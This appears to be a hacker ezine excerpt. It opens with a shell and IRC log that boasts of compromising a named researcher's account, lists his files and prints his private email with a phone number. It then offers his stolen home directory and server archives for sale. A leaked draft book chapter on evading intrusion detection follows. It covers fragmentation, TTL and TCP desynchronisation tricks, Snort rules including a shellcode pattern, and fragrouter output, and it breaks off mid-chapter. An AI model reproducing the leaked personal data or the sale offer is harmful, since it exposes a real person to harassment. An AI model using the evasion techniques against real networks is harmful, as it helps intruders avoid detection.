BitchX aempirei mclean.va.us.undernet.org
BitchX aempirei mclean.va.us.undernet.org
exit
<b_> owned mrmittens style
$ ls public_html/
1.jpg cam2.html ipids ngram-talker.tar.gz
2.jpg cawave.html jb.jpg papers/
3.jpg chiq.jpg k.html pokemon/
3rd/ code/ kengstrom-2.doc poster-rc2.tif
3rd.zip die.c kengstrom-2.txt poster.gif
4.jpg elite.gif kengstrom.doc r3sum3.doc
DurSec01/ elite.jpg kengstrom.txt r3sume.doc
GCIB/ elitespeak.c kengstrom1.doc statement.html
IrcLog fairytales1.txt links.html terminal.c
JavaCam.class fishtank.jpg main.html toolkit/
analysis/ french/ me.html twiggs1.jpg
archives/ fucker.jpg me2.html virtualip.doc
bhp.html hohoho.big.gif my_config wacked.html
boxing2.jpg index.html nastyman.2.tar.gz weapon.mp3
cam.html index.old.html nc110.tgz
$ ls public_html/code public_html/papers/ public_html/archives/
public_html/archives/:
ae-gateway.aug01+1.tar.gz ae-nat.aug01+1.tar.gz ae-rsnoop.aug07+1.tar.gz
ae-gateway.aug03+1.tar.gz ae-nat.aug06+1.tar.gz ae-shady.aug29+1.tar.gz
ae-gateway.aug06+1.tar.gz ae-nat.jul31+1.tar.gz ae-snitch.aug06+1.tar.gz
ae-gateway.jul26+1.tar.gz ae-pty.aug06+1.tar.gz ae-snitch.jul26+1.tar.gz
ae-gateway.jul27+1.tar.gz ae-pty.jul26+1.tar.gz archives.html
ae-gateway.jul29+1.tar.gz ae-rsnoop.aug04+1.tar.gz makehtml*
ae-gateway.jul30+1.tar.gz ae-rsnoop.aug05+1.tar.gz
ae-gateway.jul31+1.tar.gz ae-rsnoop.aug06+1.tar.gz
public_html/code:
fmtg.c sboxes.c sipra.c wormsim* wormsim.c
public_html/papers/:
ainow.pdf ipccc.pdf reals.doc reals.pdf rh2hpcp.pdf trustedeke.doc
$ cat importantemail
From olivier@qualys.com Wed Dec 5 17:43:22 2001
Return-Path: <olivier@qualys.com>
Delivered-To: aempirei@gravitino.net
Received: from smtp.qualys.com (mx1.qualys.com [195.68.109.150])
by gravitino (Postfix) with ESMTP id 313A74ADB10
for <aempirei@gravitino.net>; Wed, 5 Dec 2001 17:43:21 -0800 (PST)
Received: from VAIO (smtp.qualys.com [195.68.109.150])
by smtp.qualys.com (8.12.1/8.12.1) with SMTP id fB61cXPB031764
for <aempirei@gravitino.net>; Thu, 6 Dec 2001 02:38:34 +0100
From: "Olivier Devaux" <olivier@qualys.com>
To: <aempirei@gravitino.net>
Subject: RE: Resume etc.
Date: Wed, 5 Dec 2001 17:40:30 -0800
Message-ID: <FKEALHJMBDGGBEACJEILCEFADFAA.olivier@qualys.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <20011205171320.A29633@gravitino.net>
Status: RO
X-Status: A
Content-Length: 1134
Lines: 45
Hello Christopher,
Leona was right and silvio is also coming
in the us office before the end of the year.
After reading your resume, you fit exactly the
profile we are loking for.
So tell me when you will be in the bay aera
to setup an interview in our office.
If you have any question don't hesitate to mail me
or to phone me.
My phone number is (650) 801-6120
Thanks for your interest in our company.
Oliv.
> -----Original Message-----
> From: aempirei@gravitino.net [mailto:aempirei@gravitino.net]
> Sent: Wednesday, December 05, 2001 5:13 PM
> To: oliv@qualys.com
> Subject: Resume etc.
>
>
> Hello,
>
> My name is christopher abad. I was told by
> Leona, a friend of Silvio's that Qualys will
> be opening a San francisco office and to
> contact you in possible R&D Job opportunities.
> I am currently employed by foundstone inc.
> but am returning home to san francisco before
> christmas and would be interested in exploring
> any possible opportunities in san francisco.
> attached is my resume in word format. i appeciate
> the time you have taken to review my email.
>
> best regards,
> christopher abad
<b_> after alot of thinking
<b_> i have decided to sell aempirei's homedir, and the gravitino box tars
<b_> at defcon if you get a hold of me, i will be selling aempirei's homedir
<b_> for $15, and gravitino box (all users) for $30
<b_> i'll have them burned to cd's
<b_> oh and shouts to mrmittens, and vmy/hi for hacking aempirei
<b_> and to ~el8 for letting me put this in the ezine
[CUT_HERE] ch16
.~e~----------------------------------------------------------~e~.
; *15* chapter sixteen -- ktwo ;
`----------------------------------------------------------------'
y0y0y0y0y0y0, hey ladies and gents, I just thought maybe I would
take a risk and include chapter 16 of Hack Proofing Your Network
before the book is released. This is the unedited version, fresh
off the printing press. Have fun, and remember, I will be autogr-
aphing copies of Know Your Enemy for free at this upcoming defcon.
Chapter 16:
Ryan, suggest places for inclusion of code and screenshots, as requested.
I'd like to see some screenshots, packet prints, command-line options, or something for the fragrouter section.
Grammar and style was a bit awkward and punctuation was sparse. I did one pass-through (didn't track the easy edits, so it wouldn't be too hard on the eyes), please highlight anything you feel is still awkward and needs to be clarified by the author.
I like the material a lot. Just need to fix wording in a few spots, as mentioned.
Chapter 16
IDS Evasion
Solutions in this chapter:
Understanding How Signature-Based IDSs Work
Using Packet Level Evasion
Using Protocol and Application Protocol Level Evasion
Using Code Morphing Evasion
Chapter suggestions for:
Examples and Exercises:
Check for the specific code called for in each section
Screen Shots:
Screenshots for each program called for
Introduction
One of the laws of security is that all signature-based detection mechanisms can be bypassed. This is as true for Intrusion Detection System (IDS) signatures as it is for virus signatures. IDS systems, which have all the problems of a virus scanner, plus the job of modeling network state, must operate at several layers simultaneously, and they can be fooled at each of those layers.
This chapter covers techniques for evading IDSs. These techniques include playing games at the packet level, application level, and morphing the machine code. Each of these types can be used individually, or together, to evade detection by an IDS.
In this chapter, we present several examples of how an attack might evade detection.
Understanding How Signature-Based IDSs Work
An IDS is quite simply the high-tech equivalent of a burglar alarm: a burglar alarm configured to monitor access points, hostile activities and known intruders. These systems typically trigger on events by referencing network activity against an attack signature database. If a match is made, an alert will take place and will be logged for future reference. It is the makeup of this signature database that is the Achilles heel of these systems.
Attack signatures consist of several components used to uniquely describe an attack. An ideal signature would be one that is specific to the attack while being as simple as possible to match with the input data stream (large complex signatures may pose a serious processing burden). Just as there are varying types of attacks, there must be varying types of signatures. Some signatures will define the characteristics of a single IP option, perhaps that of a nmap portscan, while others will be derived from the actual payload of an attack.
Most signatures are constructed by running a known exploit several times, monitoring the data as it appears on the network and looking for a unique pattern that is repeated on every execution. This method works fairly well at ensuring that the signature will consistently match an attempt by that particular exploit. Although I have seen my share of shoddy signatures, some so simplistic in nature that the amazingly hostile activity of browsing a few Websites may set them off, remember the idea is for the unique identification of an attack, not merely the detection of attacks.
Tools & Traps
Signature Components
The following are example Snort signatures:
Breaks and indents for wrapping lines OK?
Looks good to me.
alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (msg:"SCAN Proxy
attempt";flags:S; classtype:attempted-recon; sid:620;
rev:1;)
alert ip $EXTERNAL_NET any -> $HOME_NET :1023 (msg:"SHELLCODE
linux shellcode"; content:"|90 90 90 e8 c0 ff ff ff|/bin
/sh"; classtype:attempted-admin; sid:652; rev:2;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP CWD ...";
flags:A+; content:"CWD ..."; classtype:bad-unknown; sid:1229
; rev:1;)
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP
traceroute ipopts"; ipopts: rr; itype: 0; classtype:
attempted-recon; sid:475; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-
ATTACKS chgrp command attempt"; flags:A+; content:"/usr/bin/
chgrp";nocase; sid:1337; rev:1; classtype:web-application
-attack;)
Here are some basics of Snort signatures. Snort implements a description language used to construct any rule. To avoid getting into the rather complex details of writing your own signatures, let's simply go left to right through the examples above and try to discern what exactly they mean. We can see that these all define a type of alert. These alerts are then classified into a type of protocol, then the specific details are given: IP address ($EXTERNAL_NET and $HOME_NET are variables usually defined as 10.10.10.0/24 CIDR style) and port numbers to restrict the scope. The msg keyword defines the message that will be sent out if the rule is matched; flags will define which of the TCP flags are set in the stream, just as ipopts dictates the options of an IP packet; and content is used to specify a unique series of data that appears in the actual contents of the packet. In a content field, anything between vertical bars is in hex format, while the rest is ASCII.
The first rule watches for any attempt from the outside to connect to an inside host at TCP port 8080, which is a port often used for web proxies. The second rule looks for a commonly-used shellcode sequence inside any IP packet going to a port less than 1024. (The :1023 is shorthand for a range of ports between 0 and 1023, inclusive.) The third rule is checking for a "CWD ..." command to TCP port 21, the FTP port. The fourth rule is watching for IP packets with the rr (Record Route) option on. The final rule is checking for the string /usr/bin/chgrp going to port 80, the HTTP port.
Computing systems, in their most basic abstraction, can be defined as a finite state machine, which literally means that there are only a specific predefined number of states that a system may attain. This crucial limitation hinders the IDS in that it can be well armed at only a single point in time (i.e. as well armed as the size of its database). First, how can one have foreknowledge of the internal characteristics that make up an intrusion attempt that has not yet occurred? You can't alert on attacks you've never seen before. Second, there can be only educated guesses that what has happened in the past may again transpire in the future. You can create a signature for a past attack after the fact, but that's no guarantee you'll ever see that attack again. Third, an IDS may be incapable of discerning a new attack from the background white noise of any network. The network utilization may be too high, or many false positives may cause rules to be disabled. And finally, it may be incapacitated by even the slightest modification to a known attack. It is either a weakness in the signature matching process or more fundamentally a weakness in the packet analysis engine (packet sniffing/reconstruction) that will thwart any detection capability.
Youre getting too abstract for me to follow here. I dont follow where youre going with the state-machine discussion. Are you trying to point out that the external IDS has to model the state of the victim? I think what youre saying is that 1) You cant alert on attacks youve never seen before, 2) You can create a signature for a past attack after the fact, but thats no guarantee youll ever see that attack again
is 3) relating to anomaly detection? Point 4 is understandable as-is.
How about we embed a few of these statements for clairity. The state discussion was just to get the reader accustomed to the idea of state and modeling?
The goals of an attacker as it relates to IDS evasion are twofold: To evade detection completely, or to use techniques and methods that will increase the processing load of the IDS sensor significantly. The more methods employed by attackers at large, on a wide scale, the more vendors will be forced to implement more complex signature matching and packet analysis engines. These complex systems will undoubtedly have lower operating throughputs and more opportunities for evasion. The paradox is that the more complex a system becomes, the more opportunities there are for vulnerabilities! Some say the ratio for bugs to code may be as high as 1:1000, and even conservatives say a ratio of 1:10000 may exist. With these sorts of figures in mind, a system of increasing complexity will undoubtedly lead to new levels of increased insecurity.
Judging False Positives and Negatives
To be an effective tool, an IDS must be able to digest and report information efficiently. A false positive is an event that was triggered that did not actually occur, which may be as innocuous as the download of a signature database (downloading of an IDS signature database may trigger every alarm in the book) or some unusual traffic generated by a networked game. This, although annoying, is usually not of much consequence but can easily happen and is usually tuned down by an initial configuration and burn-in of a Network IDS (NIDS) configuration. However, more dangerous is the possibility for false negatives, which is the failure to alert to an actual event. This would occur in a failure of one of the key functional units of a NIDS. False negatives are the product of a situation in which an attacker modifies their attack payload in order to subvert the detection engine.
False positives have a significant impact on the effectiveness of an IDS sensor. If you are charged with the responsibility of monitoring a device, you will find you become accustomed to its typical behavior. If there is a reasonable number of false positives being detected, the perceived urgency of an alert may be diminished by the fact that there are numerous events being triggered on a daily basis that turn into wild goose chases. In the end, all the power of IDS is ultimately controlled by the single judgment call on whether or not to take action.
Alert Flooding
This problem of making sense of what an IDS reports is apparent again in a flood scenario. Flooding, as you may have guessed, is the process of overloading the IDS by triggering a deluge of alerts. This attack has a number of beneficial actions for an attacker. If the attacker can muster enough firepower in terms of network bandwidth, a Denial of Service (DoS) attack is possible.
Many IDS sensors exacerbate this condition by the first match (or multiple match) paradox, in which the sensor has to essentially decide whether or not to alert based on the first match in its database or to attempt further matches. The issue here is that an attacker may identify a low-priority or benign signature common to many IDS signature databases and attempt to reproduce this in a more damaging exploit attempt. If the sensor were to use a first match method, it would produce an alert for the less severe vulnerability and not signal to the true nature of the attack. However, in using the multiple match approach, the IDS allows itself to be more vulnerable to alert flooding attacks. The attacker may simply package an entire signature database into some network traffic and watch the IDS crumble to the ground.
Aside from the desirable condition of failing an IDS sensor, there is the added bonus of having generated an excessive amount of alerts (in excess of 10,000 is no problem at all) that the admin must then somehow make sense of. The intended target host may be totally lost within a dizzying display of messages, beeps and red flags. Trying to identify a real intrusion event may be arduous at best. Let us not forget the psychological impact of seeing what may be construed as an all-out Internet wide assault on your networking equipment. If this style of attack were to somehow become routine, how effective would your IDS solution be then?
Using Packet Level Evasion
Are you going to cover Hailstorm here as indicated in the original outline. Not in this portion of text but somewhere within this Level One Head Section?
I spoke with Ryan about using fragrouter and such in place of Hailstorm. Clicktosecure.com is down and I am unable to get much information about it at this time.
Yes, that is correct.
Network IDSs have the dubious task of making sense of literally millions of pieces of information per second, analyzing information while providing acceptable response times (typically as close to real-time as possible is desired). To break down the effort of data analysis, a NIDS will function on several discrete layers of the network protocol stack. The first layers under inspection will be the network and transport layers, where the attacker has a great opportunity to confuse, circumvent or eliminate a NIDS sensor. If an attacker were to devise a technique that would enable them to evade detection this would be an ideal location to begin, as all other detection capabilities of the IDS rely on the ability to correctly interpret network traffic just as the target host would.
Unfortunately for the defender the characteristics of IP and TCP do not lend themselves to well-defined inspection. These protocols were developed to operate in a dynamic environment, defined by permissive standards that are laden with soft "SHOULD" and "MAY" statements, "MUST" being reserved for only the most basic requirements. This lax definition of protocol standards leads to many complications when an attempt is made to interpret network communications. This will leave the door open for an attacker to desynchronize the state of the IDS, such that it does not correctly assemble traffic in the same manner that the target host will. For example, if an IDS signature was crafted to search for the string CODE-RED in any HTTP request, it may be possible for the attacker to fragment his traffic in such a way that it will assemble differently for the IDS than it will for the target host. Therefore, the attacker may exploit the target host without the IDS being able to interpret the event accordingly.
Notes from the Underground
TCP/IP Specification Interpretation
The difficulty inherent in interpreting the TCP/IP specification is also what leads to many TCP/IP stack fingerprinting opportunities. Anything from the initial TCP sequence number to packet fragment and options handling characteristics may be used to identify a remote OS. This uniqueness of implementation (nmap has over 300 entries in its nmap-os-fingerprints database) has produced some of the most devastating and complex problems for IDS developers to overcome. The challenge of decoding what a particular stream of communications may look like to the end host without intimate knowledge of the inner workings of its protocol stack is exceedingly complex.
Author: Rephrase for clear grammar in last sidebar sentence.
Several years ago a paper was written to discuss the many issues facing NIDS development. Essentially, the attacks discussed in Thomas Ptacek and Timothy Newsham's 1998 paper, "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection", vary in style from insertion to evasion attacks. Insertion and evasion are the basis for evading a signature match.
Insertion is the technique which relies upon a situation where an IDS will accept some information with the assumption that the target host will also. However, if the IDS does not interpret the network stream in the same manner that the target does, the IDS will have a different understanding of what the communication looks like and will be ineffective in properly alerting to the presence of an attack. The IDS signature will simply not match the data acquired from the network. Our CODE-RED example may be seen by the IDS as CODE-NOT-RED, which may be enough for the IDS to feel safe, whereas the target host will actually receive CODE-RED, having dropped the NOT in the middle due to the packet containing it not matching the target's understanding of the standards.
Evasion is the converse of insertion; it relies upon a situation in which a target system will accept data that the IDS will ignore. An attack may then look something like CODE to the IDS where the target will receive CODE-RED. These sorts of attacks can be enabled in a number of ways. At any time a TCP/IP communication may be terminated by either party. If the IDS were to incorrectly interpret a RST or FIN from an attacker that was not accepted by the target host (e.g. if the IDS did not correctly monitor sequence numbers), the attacker would be free to communicate with impunity.
Denial of Service in IDS implementations is commonplace. The opportunities to subvert the operation of a sensor are quite apparent. System resources are finite; there are only so many pages of memory that can be allocated; CPUs are bound and even network IO cards may not be able to maintain consistent throughput despite their speed rating. Because a computer is a system of queues, some will inevitably fill and spill faster than the data contained may be examined. These issues vary from the micro scale when we are concerned with exhausting the relatively few network IO buffers, to macro issues similar to running low on disk resources. Management of system resources is a complex task that is made exceedingly difficult by requirements to monitor an unknown amount of communication streams and a limited view of the actual internal TCP/IP stack state for each host.
IP Options
Upon examination of an IP header, there are a number of fields in which, with methodical alteration, some insertion or evasion vulnerabilities will become apparent. Mangling the IP header must be done with care; our traffic must still be valid such that it can be routed across the Internet. Modifying the size of a packet may make it difficult for the IDS to understand where the upper layers of the packet begin (evasion). The IP checksum is another good start; if we can interleave invalid IP packets in our stream, the IDS may accept them as valid (if it does not manually calculate the checksum for every packet) where the end system does not (insertion).
Time To Live Attacks
In a typical network configuration, a NIDS would most often be placed on the perimeter of a network. This would enable the NIDS to monitor all communication across the Internet. Unfortunately if an attacker is able to traceroute or methodically reduce the Time to Live (TTL) of the traffic to the target and identify the exact number of hops required to reach the host, they would then be able to send some packets with an insufficient TTL value. This would have the effect of ensuring the packets with a lower TTL would never reach the target system, but would instead be processed by the IDS as part of the stream, as seen in Figure 16.1. Luckily administrators may be able to combat this attack by configuring their IDS on the same network segment as the hosts they wish to monitor.
Figure 16.1 TTL Insertion Attack
IP Fragmentation
IP fragmentation reassembly is the basis for a number of attacks. If a NIDS sensor does not reassemble IP fragments in a similar fashion as the target host, it will not be able to match the packet to its signature database. In normal network operations, IP fragments will typically arrive in the order in which they are sent. However, this is not always the case; IP supports difficult-to-analyze out-of-order transmission and overlapping fragment reassembly behaviors. Assembling IP fragments can also become complicated by the requirement to keep fragments in memory until the final fragment is received, in order to complete the assembly of the entire packet. This raises yet another DoS issue; many fragments can be transmitted to consume any internal buffers or structures so that the IDS may begin to drop packets or even crash.
We can further elaborate on this issue when we add the complexity of internal garbage collection. An IDS listening to the wire may have to account for the sessions of several thousand hosts, whereas each host need only be concerned with its own traffic. A host system may allow an excessive amount of time for fragments to arrive in the stream whereas the IDS may have more aggressive timeouts in order to support the management of an exponentially larger system. If the attacker were to send an attack consisting of three fragments and withhold the final fragment until a significant amount of time has expired, and if the NIDS does not have identical internal fragment management processes (something tells me this is next to impossible to attain), it will not have a consistent view of the IP packet and will therefore be incapacitated from any signature matching processes.
Fragmentation Tests
A number of tests conducted by Ptacek and Newsham revealed that at the time of testing none of the IDS platforms that were analyzed could properly interpret a number of IP fragmentation issues. The first two tests involved an in-order fragmented payload that was sent in two different sizes (8 and 24 bytes). Further testing was done where 8-byte fragments were sent with one fragment sent out of order (evasion), with a fragment sent twice (insertion), with all fragments out of order and one duplicate (combination), by sending the fragment marked as the last fragment first (evasion), and by sending a series of fragments that would overlap the previous (evasion). Startling as it may seem, none of the four products (RealSecure, NetRanger, SessionWall and NFR) were able to handle any of the fragmentation attacks.
Currently most NIDS have updated their fragmentation assembly engines such that they are capable of reconstructing streams with some degrees of success.
TCP Header
The TCP header contains a number of fields that are open to exploitation, and so opportunities for evasion and insertion exist if an IDS were not to fully inspect the TCP header. The CODE field defines the type of message being sent for the connection; if someone were to send an invalid combination or a packet missing the ACK flag it would be possible that the target host would reject the packet where the IDS would not (insertion possible). Segments marked as a SYN may also include data; due to the relatively infrequent use of this option for data, an IDS may ignore the contents of these types as well (evasion). We can examine many of the fields in the TCP header and look for any opportunity where a target host will either accept traffic that the IDS does not or vice-versa. Another great example is the Checksum field, where if the IDS were not manually calculating the checksum for every TCP segment, we may intermix segments with an invalid checksum into our legitimate session with the hope that the IDS will not validate all segments (the vendor may have assumed the processing overhead too great).
A number of new TCP options were recently added with RFC 1323, "TCP Extensions for High Performance," by V. Jacobson, R. Braden and D. Borman, which introduces (amongst other things) Protection Against Wrapped Sequence numbers (PAWS) and the option for non-SYN packets to contain new option flags. This means that if an IDS does not know how a target system may deal with non-SYN packets containing options, there are multiple opportunities for insertion and evasion. The target system may reject this newer form of TCP where the IDS will not, and again the converse is also true. PAWS is a mechanism where a system will have a timestamp associated with each TCP segment. If the target host were to receive a segment with a timestamp less than its internal threshold value, it will be dropped. Again and again we see the difficulty with examining TCP data on the wire. There is simply not enough state information transmitted to give an accurate picture of what the behavior will be of a potential target host.
Id love to see a reference to the RFC that covers PAWS here.
TCP Synchronization
Just as there are a number of attack vectors available against strictly IP communications, when we begin to analyze layers above IP, the added complexity and requirements for functionality produce new synchronization challenges. Today most IDS platforms have implemented stateful inspection for TCP.
Stateful inspection requires a number of design decisions about how to identify a communication stream when you examine TCP data. An IDS must be capable of reconstructing a stream in an identical manner as the destination host; if it cannot, there will be opportunities for an attacker to subvert the analysis engine. The state information for a TCP session is held in a structure known as a TCP Control Block (TCB). A TCB (containing information like source and destination, sequence numbers and current state) will be required for each session that a NIDS will monitor. The three attack vectors that Ptacek and Newsham identified are as follows:
TCB creation
Stream reassembly
TCB teardown.
An IDS would have to participate in these processes to identify new sessions, monitor open connections, and to identify when it is appropriate to stop monitoring.
TCB Creation
Understanding how to begin monitoring a connection poses some interesting challenges. Should the NIDS simply monitor the TCP handshake processes and build a TCB at this time? Can the NIDS effectively establish a TCB for a connection for which it did not see a SYN (connections that were active before the monitor)?
There are unique challenges with any technique used to establish a TCB. It would be desirable for the IDS to be able to monitor connections for which it did not see an initial Three Way Handshake (3WH). If not, an attacker could establish a connection and wait a significant amount of time; the IDS may reboot and then be unable to track the already established connection.
It is possible to only use ACK packets for TCB creation. This is known as "synching on data", and has the added benefit of being able to identify sessions for which a 3WH has not been inspected. There are a number of drawbacks, one being that the IDS will likely inspect excessive amounts of data as it will not be able to differentiate packets not part of a stream from established connections. Another issue is that synching on data causes a dependence on accurate sequence number checking. The attacker may be able to desynchronize the IDS by spoofing erroneous data before attempting the attack.
An alternate technique to TCB creation is to require a SYN+ACK combination to be seen. This will have the added benefit that it is nearly impossible for the attacker to effect the ACK from the target network. This will enable the IDS to identify which host is the server and which is the client. However, the IDS may be tricked into tracking many connections for non-existent hosts (DoS). A SYN+ACK can be easily spoofed without requiring the final ACK from the originating host and care should be taken when relying on this mechanism for TCB creation.
A combination of methods is usually the best strategy, building on the strengths while attempting to eliminate the weaknesses of each technique.
Stream Reassembly
A number of similar issues exist for TCP stream reassembly as for IP fragmentation assembly. The TCP segments may arrive out of order, overlap and possibly be redundant. The IDS must take special care to monitor the sequence numbers of each connection to ensure they do not get desynchronized (difficult to do in a heavily loaded environment).
Again, the difficulty with interpreting the possible behavior of the destination host, while not knowing the particulars about its TCP/IP stack implementation, is quite challenging. In the case of a redundant TCP segment, some hosts may retain the older frame, while others may discard in favor of the most recently received.
If an IDS hopes to maintain a consistent view of the traffic being evaluated, it must also be wary of the advertised window size for each connection; this value is often tuned during a session to ensure maximum throughput. If an IDS were to lose sight of the size of the TCP window, it may be vulnerable to an easy insertion attack where the attacker simply sends in excess of the window size, in which case the destination host will simply drop packets that were received outside of its advertised size.
TCB Teardown
To ensure that a DoS condition does not occur, proper garbage collection must take place. There are some challenges here. Connections may terminate at any time, with or without notice. Some systems may not require RST segments to be properly sequenced. The Internet Control Message Protocol (ICMP) may even terminate a connection; most hosts will respect an ICMP destination unreachable message as an appropriate signal for termination. If the IDS is not aware of these semantics it may become desynchronized and unable to track new connections with similar parameters.
There will almost undoubtedly be some timeout for any established connection to prevent some logic error from eventually leaking memory. This will also lead to an attack that we had alluded to earlier. Most hosts do not employ keep-alive messages for all connections. This leaves an IDS in an undesirable position where an attacker may simply wait for an excessive amount of time and possibly simultaneously provoke the IDS to become more aggressive with its garbage collection (by establishing many new connections). If successful, the attacker will be able to send whatever attacks they wish, undetected.
Using Fragrouter and Congestant
Theory is not enough for some to make a judgment on the performance of security products. We have seen time and time again that many vendors do not heed the warning of the research community. To adequately illustrate the vulnerabilities that NIDS face, Dug Song released fragrouter in September 1999. Fragrouter's benefit is that it will enable an attacker to use the same tools and exploits they have always used without modification. Fragrouter functions, as its name suggests, as a sort of fragmenting router. It implements most of the attacks described in the Ptacek and Newsham paper.
Congestant is another great tool that implements a number of anti-IDS packet mangling techniques. This was authored by "horizon" and was first released in December 1998 in his paper, "Defeating Sniffers and Intrusion Detection Systems" (www.phrack.org/show.php?p=54&a=10) for phrack 54. The difference here is that Congestant is implemented as a shared library or a kernel patch to OpenBSD. You may find that it is possible to use these tools concurrently for some added confusion for the IDS sensor.
Increasing the processing overhead and complexity of IDS sensors is of benefit to an attacker; these systems become more prone to DoS and less likely to perform in an environment of extreme stress (large number of packets per second). It is a certainty that there will always be more features and options added to IDSs as they mature, as an attacker will always attempt to identify the critical execution path (the most CPU intensive operation an IDS may make) in attempts to stress an IDS sensor.
Id love to see some detail here. These programs are designed to be pretty transparent. And chance you could print a before-and-after packet going through fragrouter?
Here is the output when running fragrouter from a shell, its pretty plug-and-play, you just need to ensure that your system will route through the fragrouter host to reach the target.
storm:~/dl/fragrouter-1.6# ./fragrouter -F5
fragrouter: frag-5: out of order 8-byte fragments, one duplicate
truncated-tcp 8 (frag 21150:8@0+)
10.10.42.9 > 10.10.42.3: (frag 21150:8@16+)
10.10.42.9 > 10.10.42.3: (frag 21150:8@8+)
10.10.42.9 > 10.10.42.3: (frag 21150:8@16+)
10.10.42.9 > 10.10.42.3: (frag 21150:4@24)
truncated-tcp 8 (frag 57499:8@0+)
10.10.42.9 > 10.10.42.3: (frag 57499:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57499:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57499:4@16)
truncated-tcp 8 (frag 57500:8@0+)
10.10.42.9 > 10.10.42.3: (frag 57500:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57500:8@8+)
10.10.42.9 > 10.10.42.3: (frag 57500:4@16)
truncated-tcp 8 (frag 58289:8@0+)
10.10.42.9 > 10.10.42.3: (frag 58289:8@8+)
10.10.42.9 > 10.10.42.3: (frag 58289:8@8+)
10.10.42.9 > 10.10.42.3: (frag 58289:4@16)
Here is a comparison of how the tcpdump output from the fragrouter F5 technique ("frag-5: out of order 8-byte fragments, one duplicate") would appear against normal traffic. Note the DF (Don't Fragment) flags on every packet of a normal connection and that the fragrouter stream has several fragmented packets.
Before (no fragrouter):
19:36:52.469751 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:36:52.469815 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:36:52.470822 10.10.42.9.32920 > 10.10.42.3.7: . ack 4206722337 win 24820 (DF)
19:36:52.470841 10.10.42.9.32920 > 10.10.42.3.7: . ack 1 win 24820 (DF)
19:36:53.165813 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:36:53.165884 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:36:53.171968 10.10.42.9.32920 > 10.10.42.3.7: . ack 2 win 24820 (DF)
19:36:53.171984 10.10.42.9.32920 > 10.10.42.3.7: . ack 2 win 24820 (DF)
After (with fragrouter):
19:37:29.528452 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:37:29.528527 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 <nop,nop,sackOK,mss 1460> (DF)
19:37:29.529167 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 21150:8@0+)
19:37:29.529532 10.10.42.9.32921 > 10.10.42.3.7: . ack 4211652507 win 24820 (DF)
19:37:29.529564 10.10.42.9.32921 > 10.10.42.3.7: . ack 1 win 24820 (DF)
19:37:29.530293 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57499:8@0+)
19:37:30.309450 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:37:30.309530 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF)
19:37:30.310082 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57500:8@0+)
19:37:30.316337 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF)
19:37:30.316357 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF)
19:37:30.316695 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 58289:8@0+)
Countermeasures
For those wishing to implement NIDS throughout their network infrastructure, fortunately there are some emerging technologies that help eliminate a great many of these lower-layer protocol vulnerabilities. Protocol normalization, as discussed by Mark Handley and Vern Paxson in May 2001 in "Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics", is an attempt to scrub or rewrite network traffic as it enters a destination network. This scrubbing process should eliminate many of the difficulties in reconstructing a consistent view of network traffic. If an IDS and target host were both behind a network protocol scrubber, they would both receive an identical picture of the network traffic.
Tools & Traps
Honeynets
Recently there has been an upsurge in the use of honeynets as a defensive tool. A honeynet is a system that is deployed with the intended purpose of being compromised. These are hyper defensive tools that can be implemented at any location inside a network. The current best known configuration type for these tools is where two systems are deployed, one for the bait, the other configured to log all traffic.
The logging host should be configured as a bridge (invisible to any remote attacker) with sufficient disk space to record all network traffic for later analysis. The system behind the logging host can be configured in any fashion. Most systems are quite simply bait, meaning that they are designed to be the most attractive target on a network segment. It is the hope of the defender that all attackers would see this easy point of presence and target their attacks in that direction. However, there is also cause to have bait systems configured identically to other production systems on the target network (hopefully hardened), so that if an attacker's presence is detected on the honeynet (nobody can transmit any data to this system without detection), the defender can be sure that there are vulnerabilities in their production configuration. With the added benefit of detailed logging, some low level forensics will typically reveal the vulnerability information along with any backdoors the intruder used to maintain their foothold.
However, no system is foolproof. Attackers should be able to discern that they are behind a bridge by the lack of layer 2 traffic and the discrepancy in Media Access Control (MAC) addresses in the bait system's ARP cache.
See http://project.honeynet.org for more details.
Using Application Protocol Level Evasion
IDS sensors have the ability to inspect the protocol internals of a communications stream to aid in the detection process. There are two basic strategies that vendors employ: application protocol decoding, where the IDS will attempt to parse the network input to determine the legitimacy of the service request, and simple signature matching. Both of these approaches have their own unique challenges and benefits; we will see that most IDSs probably implement a hybrid of these solutions. Opportunities to evade detection are available at every layer of the protocol stack.
Security as an Afterthought
